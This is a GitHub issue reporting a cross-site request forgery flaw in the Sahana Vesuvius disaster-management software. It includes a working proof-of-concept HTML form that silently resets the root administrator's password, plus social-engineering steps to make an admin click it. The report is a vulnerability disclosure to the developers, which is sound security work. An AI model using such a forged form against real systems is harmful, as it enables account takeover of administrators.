sahana / vesuvius

Sahana Vesuvius
http://sahanafoundation.org/products/vesuvius/
MIT License
24 stars 27 forks source link

CSRF vulnarability #56

Open sampathLiyanage opened 10 years ago

sampathLiyanage commented 10 years ago

I checked security of Vesuvius and found a critical vulnerability. Vesuvius forms don't have CSRF tokens...!!! This allows someone to submit vesuvius forms from any webpage outside vesuvius.

for an example if an attacker wants to change the password of the user "root", the attacker can change it by following the steps below.

  1. host a website and create the following form on a webpage. < form method="post" action="http://localhost/vesuvius/www/admin?passwdp&amp;tabid=5" name="form0"> < input type="hidden" name="user" value="1"> < input type="hidden" name="password" value="hacked"> < input type="hidden" name="re_password" value="hacked"> < input type="submit" value="Click Here">< /form>

    note: form action changes according to the web address of vesuvius

  2. send the link of the webpage to vesuvius admin and make admin clicks the button. If admin clicks the button while he is logged in to vesuvius, the password of the user "root" will be changed to "hacked" immediately...!!!

    With a bit of social engineering this can be achieved easily.